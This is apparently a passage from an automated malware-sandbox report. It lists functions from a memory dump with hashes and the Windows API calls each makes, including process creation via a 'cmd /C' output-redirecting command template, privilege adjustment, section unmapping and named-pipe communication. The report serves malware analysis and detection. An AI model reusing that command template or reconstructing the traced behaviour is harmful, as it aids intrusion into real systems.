  • Opcode ID: af5c98305472d103a45b2540159c41f58267bab1f426382dbe25329856732327
  • Instruction ID: 245f3b5a859ad928aa4cb327569d8433b77dc68c1aea4cbcf243a63b81ac7fdd
  • Opcode Fuzzy Hash: 40317033188AC386C62778D245A67BCDD44BF811E684D5716ED08B418DAF8722E77F1A
  • Instruction Fuzzy Hash: 245f3b5a859ad928aa4cb327569d8433b77dc68c1aea4cbcf243a63b81ac7fdd
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
  • GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
  • QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
  • QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
  • _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001D9192: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,001DDF8D), ref: 001D919B
    • Part of subcall function 001D9192: _aulldiv.NTDLL(?,001DDF8D,00989680,00000000), ref: 001D91BB
    • Part of subcall function 001DD6F0: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD70C
    • Part of subcall function 001DD6F0: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD72A
  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
  • GetTickCount.KERNEL32 ref: 001DDCFC
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DD9CB: strcpy.NTDLL ref: 001DDA09
    • Part of subcall function 001DD9CB: lstrcat.KERNEL32(00000000,?), ref: 001DDA14
    • Part of subcall function 001DD9CB: StrTrimA.SHLWAPI(00000000,001E747C), ref: 001DDA31
  • StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001D955B: lstrcpy.KERNEL32(00000000,?), ref: 001D9586
    • Part of subcall function 001D955B: lstrcat.KERNEL32(00000000,?), ref: 001D9591
  • lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
  • HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
  • HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
  • HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DDE6F, Relevance: 19.8, APIs: 13, Instructions: 257 Total matches: 1memorystring
Similarity
  • Total matches: 1
  • API ID: HeapFree$lstrcat$RtlAllocateHeap$StrTrimlstrcpy
  • String ID:
  • API String ID: 2176245286-0
  • Opcode ID: e358d8d67c30f9e67b4615eb8f19913a0addd12755002ea1bba3c3ca2f9fd4df
  • Instruction ID: 8fbef3a02343e44f8b833e415adb96bb5717882f7b287c29abc605180dd9e952
  • Opcode Fuzzy Hash: 19317C33288A01C6822764C646E977DFD09FF811E990E6B16EE457404D2EC30AF5BF7A
  • Instruction Fuzzy Hash: 8fbef3a02343e44f8b833e415adb96bb5717882f7b287c29abc605180dd9e952
APIs
  • RtlAllocateHeap.NTDLL ref: 001DDEA1
  • lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DD6F0: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD70C
    • Part of subcall function 001DD6F0: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD72A
    • Part of subcall function 001D9192: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,001DDF8D), ref: 001D919B
    • Part of subcall function 001D9192: _aulldiv.NTDLL(?,001DDF8D,00989680,00000000), ref: 001D91BB
  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DD9CB: strcpy.NTDLL ref: 001DDA09
    • Part of subcall function 001DD9CB: lstrcat.KERNEL32(00000000,?), ref: 001DDA14
    • Part of subcall function 001DD9CB: StrTrimA.SHLWAPI(00000000,001E747C), ref: 001DDA31
  • StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001D955B: lstrcpy.KERNEL32(00000000,?), ref: 001D9586
    • Part of subcall function 001D955B: lstrcat.KERNEL32(00000000,?), ref: 001D9591
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
  • lstrcat.KERNEL32(00000000,?), ref: 001DE06F
  • lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DFFD2: memset.NTDLL ref: 001E000B
    • Part of subcall function 001DFFD2: memcpy.NTDLL(00000084,00000084,?,00000000,00000000,?,?,00000000,?,?), ref: 001E0017
  • HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001CE1E5: lstrlen.KERNEL32(?,00000000,001E5128,00000000), ref: 001CE205
    • Part of subcall function 001CE1E5: wsprintfA.USER32 ref: 001CE22F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
  • HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
  • HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
  • HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
  • HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1000, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156 Total matches: 1memoryfilestring
Similarity
  • Total matches: 1
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeapWriteFilelstrcpy
  • String ID: qwerty
  • API String ID: 1232246474-55151997
  • Opcode ID: 8025ce6979e3e0b730e9e5b5069bd5d5c92c7b34e4099fbe40c64fb372d3362f
  • Instruction ID: 17979a94517c5d7eaceea80456e78354db22995af431dd8f5d96e6019258e958
  • Opcode Fuzzy Hash: 5711597508468386902738E58072BBCD601BB525C8C8D2327F9487E60E3B57B0E5AF53
  • Instruction Fuzzy Hash: 17979a94517c5d7eaceea80456e78354db22995af431dd8f5d96e6019258e958
APIs
  • lstrcpy.KERNEL32(00000000,?), ref: 001C1046
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
  • CloseHandle.KERNEL32(00000000), ref: 001C1168
  • HeapFree.KERNEL32(00000000,?), ref: 001C1178
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
  • HeapFree.KERNEL32(00000000,?), ref: 001C11A3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7422, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 102 Total matches: 8processstring
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
